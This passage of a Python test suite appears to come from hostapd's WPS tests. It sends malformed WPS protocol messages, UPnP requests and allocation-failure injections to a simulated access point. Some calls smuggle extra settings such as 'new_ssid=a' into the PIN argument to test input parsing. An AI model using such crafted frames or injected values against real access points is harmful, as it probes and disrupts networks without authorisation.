addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_NACK to AP")
nack,attrs = build_nack(msg['eap_identifier'], e_nonce, r_nonce,
config_error=None, eap_code=2)
send_wsc_msg(hapd, addr, nack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_ack_invalid(dev, apdev):
"""WPS proto: M2 followed by invalid ACK"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_ACK to AP")
attrs = b'\x10\x00\x00'
ack = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_ACK)
send_wsc_msg(hapd, addr, ack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_ack(dev, apdev):
"""WPS proto: M2 followed by ACK"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_ACK to AP")
ack,attrs = build_ack(msg['eap_identifier'], e_nonce, r_nonce, eap_code=2)
send_wsc_msg(hapd, addr, ack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_ack_no_msg_type(dev, apdev):
"""WPS proto: M2 followed by ACK missing Msg Type"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_ACK to AP")
ack,attrs = build_ack(msg['eap_identifier'], e_nonce, r_nonce,
msg_type=None, eap_code=2)
send_wsc_msg(hapd, addr, ack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_ack_invalid_msg_type(dev, apdev):
"""WPS proto: M2 followed by ACK with invalid Msg Type"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_ACK to AP")
ack,attrs = build_ack(msg['eap_identifier'], e_nonce, r_nonce,
msg_type=WPS_WSC_NACK, eap_code=2)
send_wsc_msg(hapd, addr, ack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_ack_e_nonce_mismatch(dev, apdev):
"""WPS proto: M2 followed by ACK with e-nonce mismatch"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_ACK to AP")
ack,attrs = build_ack(msg['eap_identifier'], 16*b'\x00', r_nonce,
eap_code=2)
send_wsc_msg(hapd, addr, ack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m1_invalid(dev, apdev):
"""WPS proto: M1 failing parsing"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
logger.debug("Send M1 to AP")
attrs = b'\x10\x00\x00'
m1 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m1)
wps_wait_eap_failure(hapd, dev[0])
def test_wps_ext_m1_missing_msg_type(dev, apdev):
"""WPS proto: M1 missing Msg Type"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
logger.debug("Send M1 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
m1 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m1)
wps_wait_ap_nack(hapd, dev[0], 16*b'\x00', 16*b'\x00')
def wps_ext_wsc_done(dev, apdev):
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
data = build_wsc_attr(ATTR_E_SNONCE1, e_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
logger.debug("Receive M6 from AP")
msg, m6_attrs, raw_m6_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M6)
logger.debug("Send M7 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M7)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
data = build_wsc_attr(ATTR_E_SNONCE2, e_s2)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m6_attrs, attrs)
m7 = build_eap_wsc(2, msg['eap_identifier'], attrs)
raw_m7_attrs = attrs
send_wsc_msg(hapd, addr, m7)
logger.debug("Receive M8 from AP")
msg, m8_attrs, raw_m8_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M8)
return hapd, msg, e_nonce, r_nonce
@remote_compatible
def test_wps_ext_wsc_done_invalid(dev, apdev):
"""WPS proto: invalid WSC_Done"""
hapd, msg, e_nonce, r_nonce = wps_ext_wsc_done(dev, apdev)
logger.debug("Send WSC_Done to AP")
attrs = b'\x10\x00\x00'
wsc_done = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_Done)
send_wsc_msg(hapd, dev[0].own_addr(), wsc_done)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_wsc_done_no_msg_type(dev, apdev):
"""WPS proto: invalid WSC_Done"""
hapd, msg, e_nonce, r_nonce = wps_ext_wsc_done(dev, apdev)
logger.debug("Send WSC_Done to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
#attrs += build_attr_msg_type(WPS_WSC_DONE)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
wsc_done = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_Done)
send_wsc_msg(hapd, dev[0].own_addr(), wsc_done)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_wsc_done_wrong_msg_type(dev, apdev):
"""WPS proto: WSC_Done with wrong Msg Type"""
hapd, msg, e_nonce, r_nonce = wps_ext_wsc_done(dev, apdev)
logger.debug("Send WSC_Done to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_WSC_ACK)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
wsc_done = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_Done)
send_wsc_msg(hapd, dev[0].own_addr(), wsc_done)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_wsc_done_no_e_nonce(dev, apdev):
"""WPS proto: WSC_Done without e_nonce"""
hapd, msg, e_nonce, r_nonce = wps_ext_wsc_done(dev, apdev)
logger.debug("Send WSC_Done to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_WSC_DONE)
#attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
wsc_done = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_Done)
send_wsc_msg(hapd, dev[0].own_addr(), wsc_done)
wps_wait_eap_failure(hapd, dev[0])
def test_wps_ext_wsc_done_no_r_nonce(dev, apdev):
"""WPS proto: WSC_Done without r_nonce"""
hapd, msg, e_nonce, r_nonce = wps_ext_wsc_done(dev, apdev)
logger.debug("Send WSC_Done to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_WSC_DONE)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
#attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
wsc_done = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_Done)
send_wsc_msg(hapd, dev[0].own_addr(), wsc_done)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m7_no_encr_settings(dev, apdev):
"""WPS proto: M7 without Encr Settings"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
data = build_wsc_attr(ATTR_E_SNONCE1, e_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
logger.debug("Receive M6 from AP")
msg, m6_attrs, raw_m6_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M6)
logger.debug("Send M7 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M7)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
#data = build_wsc_attr(ATTR_E_SNONCE2, e_s2)
#attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m6_attrs, attrs)
m7 = build_eap_wsc(2, msg['eap_identifier'], attrs)
raw_m7_attrs = attrs
send_wsc_msg(hapd, addr, m7)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m1_workaround(dev, apdev):
"""WPS proto: M1 Manufacturer/Model workaround"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk, manufacturer='Apple TEST',
model_name='AirPort', config_methods=b'\xff\xff')
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
@remote_compatible
def test_ap_wps_disable_enable(dev, apdev):
"""WPS and DISABLE/ENABLE AP"""
hapd = wps_start_ap(apdev[0])
hapd.disable()
hapd.enable()
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
def test_ap_wps_upnp_web_oom(dev, apdev, params):
"""hostapd WPS UPnP web OOM"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hapd = add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
url = urlparse(location)
urls = upnp_get_urls(location)
eventurl = urlparse(urls['event_sub_url'])
ctrlurl = urlparse(urls['control_url'])
conn = HTTPConnection(url.netloc)
with alloc_fail(hapd, 1, "web_connection_parse_get"):
conn.request("GET", "/wps_device.xml")
try:
resp = conn.getresponse()
except:
pass
conn = HTTPConnection(url.netloc)
conn.request("GET", "/unknown")
resp = conn.getresponse()
if resp.status != 404:
raise Exception("Unexpected HTTP result for unknown URL: %d" + resp.status)
with alloc_fail(hapd, 1, "web_connection_parse_get"):
conn.request("GET", "/unknown")
try:
resp = conn.getresponse()
print(resp.status)
except:
pass
conn = HTTPConnection(url.netloc)
conn.request("GET", "/wps_device.xml")
resp = conn.getresponse()
if resp.status != 200:
raise Exception("GET /wps_device.xml failed")
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo")
if resp.status != 200:
raise Exception("GetDeviceInfo failed")
with alloc_fail(hapd, 1, "web_process_get_device_info"):
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo")
if resp.status != 500:
raise Exception("Internal error not reported from GetDeviceInfo OOM")
with alloc_fail(hapd, 1, "wps_build_m1;web_process_get_device_info"):
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo")
if resp.status != 500:
raise Exception("Internal error not reported from GetDeviceInfo OOM")
with alloc_fail(hapd, 1, "wpabuf_alloc;web_connection_send_reply"):
conn = HTTPConnection(url.netloc)
try:
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo")
except:
pass
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo")
if resp.status != 200:
raise Exception("GetDeviceInfo failed")
# No NewWLANEventType in PutWLANResponse NewMessage
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "PutWLANResponse", newmsg="foo")
if resp.status != 600:
raise Exception("Unexpected HTTP response: %d" % resp.status)
# No NewWLANEventMAC in PutWLANResponse NewMessage
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "PutWLANResponse",
newmsg="foo", neweventtype="1")
if resp.status != 600:
raise Exception("Unexpected HTTP response: %d" % resp.status)
# Invalid NewWLANEventMAC in PutWLANResponse NewMessage
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "PutWLANResponse",
newmsg="foo", neweventtype="1",
neweventmac="foo")
if resp.status != 600:
raise Exception("Unexpected HTTP response: %d" % resp.status)
# Workaround for NewWLANEventMAC in PutWLANResponse NewMessage
# Ignored unexpected PutWLANResponse WLANEventType 1
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "PutWLANResponse",
newmsg="foo", neweventtype="1",
neweventmac="00.11.22.33.44.55")
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
# PutWLANResponse NewMessage with invalid EAP message
conn = HTTPConnection(url.netloc)
resp = upnp_soap_action(conn, ctrlurl.path, "PutWLANResponse",
newmsg="foo", neweventtype="2",
neweventmac="00:11:22:33:44:55")
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 1, "web_connection_parse_subscribe"):
conn = HTTPConnection(url.netloc)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
try:
resp = conn.getresponse()
except:
pass
with alloc_fail(hapd, 1, "dup_binstr;web_connection_parse_subscribe"):
conn = HTTPConnection(url.netloc)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 500:
raise Exception("Unexpected HTTP response: %d" % resp.status)
with alloc_fail(hapd, 1, "wpabuf_alloc;web_connection_parse_unsubscribe"):
conn = HTTPConnection(url.netloc)
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("UNSUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
try:
resp = conn.getresponse()
except:
pass
with alloc_fail(hapd, 1, "web_connection_unimplemented"):
conn = HTTPConnection(url.netloc)
conn.request("HEAD", "/wps_device.xml")
try:
resp = conn.getresponse()
except:
pass
def test_ap_wps_frag_ack_oom(dev, apdev):
"""WPS and fragment ack OOM"""
dev[0].request("SET wps_fragment_size 50")
hapd = wps_start_ap(apdev[0])
with alloc_fail(hapd, 1, "eap_wsc_build_frag_ack"):
wps_run_pbc_fail_ap(apdev[0], dev[0], hapd)
def wait_scan_stopped(dev):
dev.request("ABORT_SCAN")
for i in range(50):
res = dev.get_driver_status_field("scan_state")
if "SCAN_STARTED" not in res and "SCAN_REQUESTED" not in res:
break
logger.debug("Waiting for scan to complete")
time.sleep(0.1)
@remote_compatible
def test_ap_wps_eap_wsc_errors(dev, apdev):
"""WPS and EAP-WSC error cases"""
ssid = "test-wps-conf-pin"
appin = "12345670"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"fragment_size": "300", "ap_pin": appin }
hapd = hostapd.add_ap(apdev[0], params)
bssid = apdev[0]['bssid']
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].wps_reg(bssid, appin + " new_ssid=a", "new ssid", "WPA2PSK", "CCMP",
"new passphrase", no_wait=True)
ev = dev[0].wait_event(["WPS-FAIL"], timeout=10)
if ev is None:
raise Exception("WPS-FAIL not reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
wait_scan_stopped(dev[0])
dev[0].dump_monitor()
dev[0].wps_reg(bssid, appin, "new ssid", "FOO", "CCMP",
"new passphrase", no_wait=True)
ev = dev[0].wait_event(["WPS-FAIL"], timeout=10)
if ev is None:
raise Exception("WPS-FAIL not reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
wait_scan_stopped(dev[0])
dev[0].dump_monitor()
dev[0].wps_reg(bssid, appin, "new ssid", "WPA2PSK", "FOO",
"new passphrase", no_wait=True)
ev = dev[0].wait_event(["WPS-FAIL"], timeout=10)
if ev is None:
raise Exception("WPS-FAIL not reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
wait_scan_stopped(dev[0])
dev[0].dump_monitor()
dev[0].wps_reg(bssid, appin + "new_key=a", "new ssid", "WPA2PSK", "CCMP",
"new passphrase", no_wait=True)
ev = dev[0].wait_event(["WPS-FAIL"], timeout=10)
if ev is None:
raise Exception("WPS-FAIL not reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
wait_scan_stopped(dev[0])
dev[0].dump_monitor()
tests = [ "eap_wsc_init",
"eap_msg_alloc;eap_wsc_build_msg",
"wpabuf_alloc;eap_wsc_process_fragment" ]
for func in tests:
with alloc_fail(dev[0], 1, func):
dev[0].request("WPS_PIN %s %s" % (bssid, pin))
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
wait_scan_stopped(dev[0])
dev[0].dump_monitor()
with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_sm_build_expanded_nak"):
dev[0].wps_reg(bssid, appin + " new_ssid=a", "new ssid", "WPA2PSK",
"CCMP", "new passphrase", no_wait=True)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
wait_scan_stopped(dev[0])
dev[0].dump_monitor()
def test_ap_wps_eap_wsc(dev, apdev):
"""WPS and EAP-WSC in network profile"""
params = int_eap_server_params()
params["wps_state"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
bssid = apdev[0]['bssid']
logger.info("Unexpected identity")
